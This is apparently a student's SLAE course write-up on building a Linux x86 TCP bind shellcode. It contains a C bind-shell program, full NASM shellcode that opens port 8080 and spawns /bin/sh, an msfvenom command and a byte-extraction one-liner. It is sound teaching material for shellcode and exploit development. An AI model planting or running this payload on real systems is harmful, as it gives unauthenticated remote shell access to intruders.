SLAE Assignment 1 - TCP Bind Shellcode

    Student SLAE - 891

    Hello everybody,

    Here we are for a new set of posts dealing with the exam of the great course Assembly Language and Shellcoding on Linux. Thanks to Vivek Ramachandran and his team for all of this work.

    For information, the SLAE course has been performed on a 32bits Kali environment:

    # uname -a
    Linux kali 4.6.0-kali1-686 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux

    We recommend to run the commands on a 32bits environment. Otherwise you should adapt them:

    nasm -f elf32 -o $1.o $1.nasm
    ld -m elf_i386 -o $1 $1.o
    gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c

    So let’s rumble!

    Assignment 1:

    Code is available on my github repo.

    Our Goal:

    Create a Shell_Bind_TCP shellcode:

    • binds to a port that should be easily configurable
    • executes shell on incoming connection
    • easily configure the listening port

    If we want to create a TCP Bind shellcode from scratch, what are our options?:

    1) The lazy one; creating a shellcode thanks to msfvenom

    msfvenom -p linux/x86/shell_bind_tcp LPORT=8080 EXITFUNC=THREAD -f raw | ndisasm -u -

    But it is quite too easy.

    2) Creating our own ELF thanks to a C program that will help to understand how the final shellcode will work.

    We will choose this last option.

    Here is our C source code:

    #include <sys/socket.h>
    #include <sys/types.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <netinet/in.h>
    int main(void)
            int clientfd, sockfd;
            int dstport = 8080;
            struct sockaddr_in mysockaddr;
            sockfd = socket(AF_INET, SOCK_STREAM, 0);
            mysockaddr.sin_family = AF_INET; //2
            mysockaddr.sin_port = htons(dstport); //8080
            mysockaddr.sin_addr.s_addr = INADDR_ANY; //0
            bind(sockfd, (struct sockaddr *) &mysockaddr, sizeof(mysockaddr));
            listen(sockfd, 0);
            clientfd = accept(sockfd, NULL, NULL);
            dup2(clientfd, 0);
            dup2(clientfd, 1);
            dup2(clientfd, 2);
            execve("/bin/sh", NULL, NULL);
            return 0;

    Let’s test it:

    gcc -fno-stack-protector -z execstack -ggdb -o shell-bind-tcp shell-bind-tcp.c

    From another shell:

    The objdump -d ./shell-bind-tcp -M intel produces a huge amount of assembly code.
    Something good to notice is that our ELF has been dynamically linked:

    The ELF is using the .plt and .got sections in order to dynamically address the interesting functions.
    These functions are LIBC functions:

    We will need to translate these function calls into system calls. Let’s focus on the following functions:


    Let’s have a look in /usr/include/i386-linux-gnu/asm/unistd_32.h:

    #define __NR_execve 11
    #define __NR_dup2 63
    #define __NR_socketcall 102

    What is the syscall socketcall?

    man 2 socketcall
    SOCKETCALL(2)                                             Linux Programmer's Manual                                            SOCKETCALL(2)
           socketcall - socket system calls
           int socketcall(int call, unsigned long *args);
           socketcall()  is  a  common  kernel  entry point for the socket system calls.  call determines which socket function to invoke.  args
           points to a block containing the actual arguments, which are passed through to the appropriate call.
           User programs should call the appropriate functions by their usual names.  Only standard library implementors and kernel hackers need
           to know about socketcall().

    Let’s check the different values of the first int call argument:

    grep SYS_ /usr/include/linux/net.h 
    #define SYS_SOCKET   1             /* sys_socket(2)            */
    #define SYS_BIND     2             /* sys_bind(2)              */
    #define SYS_CONNECT  3             /* sys_connect(2)           */
    #define SYS_LISTEN   4             /* sys_listen(2)            */
    #define SYS_ACCEPT   5             /* sys_accept(2)            */
    #define SYS_GETSOCKNAME     6      /* sys_getsockname(2)       */
    #define SYS_GETPEERNAME     7      /* sys_getpeername(2)       */
    #define SYS_SOCKETPAIR      8      /* sys_socketpair(2)        */
    #define SYS_SEND     9             /* sys_send(2)              */
    #define SYS_RECV     10            /* sys_recv(2)              */
    #define SYS_SENDTO   11            /* sys_sendto(2)            */
    #define SYS_RECVFROM 12            /* sys_recvfrom(2)          */
    #define SYS_SHUTDOWN 13            /* sys_shutdown(2)          */
    #define SYS_SETSOCKOPT      14     /* sys_setsockopt(2)        */
    #define SYS_GETSOCKOPT      15     /* sys_getsockopt(2)        */
    #define SYS_SENDMSG  16            /* sys_sendmsg(2)           */
    #define SYS_RECVMSG  17            /* sys_recvmsg(2)           */
    #define SYS_ACCEPT4  18            /* sys_accept4(2)           */
    #define SYS_RECVMMSG 19            /* sys_recvmmsg(2)          */
    #define SYS_SENDMMSG 20            /* sys_sendmmsg(2)          */

    So let’s dive into our shellcode:

    ; shell_bind_tcp.nasm
    ; A TCP port bind shellcode
    ; Author: SLAE - 891
    ; You are free to use and/or redistribute it without restriction
    global _start
    section       .text
    ; sockfd = socket(AF_INET, SOCK_STREAM, 0);
    ; int socketcall(int call, unsigned long *args);
    ; #define __NR_socketcall   102
    ; #define SYS_SOCKET        1
           xor ebx,ebx
           mul ebx              ; zero out eax and edx
           mov al, 102          ; __NR_socketcall
           mov bl, 1            ; SYS_SOCKET
           ; we are pushing on the stack our arguments
           push edx             ; IPPROTO_IP
           push byte 1          ; SOCK_STREAM
           push byte 2          ; AF_INET
           mov ecx, esp         ; the top of the stack points to a structure of 3 arguments
           int 0x80             ; syscall - result is stored in eax
           mov edi, eax         ; stores sockfd
    ; bind(sockfd, (struct sockaddr *) &mysockaddr, sizeof(mysockaddr));
    ; int socketcall(int call, unsigned long *args);
    ; #define __NR_socketcall   102
    ; #define SYS_BIND                 2
           push edx             ; mysockaddr.sin_addr.s_addr = INADDR_ANY; //0 - listen on (all interfaces)
           push word 0x901f     ; mysockaddr.sin_port = htons(dstport); //8080
           push word 2          ; AF_INET
           mov ebx, esp         ; stores the address of mysockaddr
           push byte 16         ; length of mysockaddr
           push ebx             ; pointer to mysockaddr
           push edi             ; sockfd
           xor ebx, ebx         ; flushing registers
           mul ebx
           mov al, 102          ; __NR_socketcall
           mov bl, 2            ; SYS_BIND
           mov ecx, esp         ; pointer to the args for socketcall
           int 0x80
    ; listen(sockfd, 0);
    ; int socketcall(int call, unsigned long *args);
    ; #define __NR_socketcall   102
    ; #define SYS_LISTEN        4
           push edx             ; 0
           push edi             ; sockfd
           xor ebx, ebx         ; flushing registers
           mul ebx
           mov al, 102          ; __NR_socketcall
           mov bl, 4            ; SYS_LISTEN
           mov ecx, esp         ; pointer to the args for socketcall
           int 0x80 
    ; clientfd = accept(sockfd, NULL, NULL);
    ; int socketcall(int call, unsigned long *args);
    ; #define __NR_socketcall   102
    ; #define SYS_ACCEPT        5
           xor ebx, ebx         ; flushing registers
           mul ebx
           push edx             ; NULL
           push edx             ; NULL
           push edi             ; sockfd
           mov al, 102          ; __NR_socketcall
           mov bl, 5            ; SYS_ACCEPT
           mov ecx, esp         ; pointer to args
           int 0x80             ; returns clientfd file descriptor in eax
    ; int dup2(int oldfd, int newfd); duplicates a file descriptor
    ; dup2(clientfd, 0); 
    ; dup2(clientfd, 1);
    ; dup2(clientfd, 2);
    ; #define __NR_dup2 63
           mov ebx, eax         ; clientfd as first argument
           xor ecx, ecx
           mov cl, 2            ; 2 for stderr / 1 for stdout / 0 for stdin
           xor eax, eax
           mov al, 63           ; __NR_dup2
           int 0x80
           dec ecx
           jns dup2             ; jump short if not signed 
    ; execve("/bin/sh", NULL, NULL);
    ; #define __NR_execve 11
           xor eax,eax
           push eax
           push 0x68732f2f      ; hs// - take care to the little endian representation
           push 0x6e69622f      ; nib/
           mov ebx, esp         ; pointer to command string
           mov ecx, eax
           mov edx, eax
           mov al, 11           ; __NR_execve
           int 0x80

    Let’s compile with the script:

    ./ shell_bind_tcp
    [+] Assembling with Nasm ... 
    [+] Linking ...
    [+] Done!

    Let’s run shell_bind_tcp and try to connect from another shell:

    What we have to take care in shellcodes are bad characters. Each compromised application will lead to its own set of bad characters that we will need to avoid in the shellcode part of the exploit.
    Right now let’s check that our shellcode do not contain null bytes:

    objdump -d shell_bind_tcp -M intel | grep 00

    Great, no null bytes. Let’s dump our shellcode:

    objdump -d ./shell_bind_tcp|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

    Let’s execute it in shellcode.c:

    gcc -fno-stack-protector -z execstack -o shellcode shellcode.c && ./shellcode

    Then from another shell:

    One easy way to customize the listening port is to set a pattern in the source file and to generate the shellcode thanks to a wrapper script.
    We are creating a shell_bind_tcp.template and updating the following part:
    push word 0x901f becomes push word PORT.

    Now we will use the script:

    Usage: ./ <port_number> <pattern> <file>
    ./ 8080 PORT ./shell_bind_tcp.template 
    [+] Assembling with Nasm ... 
    [+] Linking ...
    [+] Done!

    So now we can parametrize the port number and generate a TCP port binding shellcode.

    Hope you enjoyed,
    Thanks a lot and as i’m used to saying, do not hesitate to comment and share.
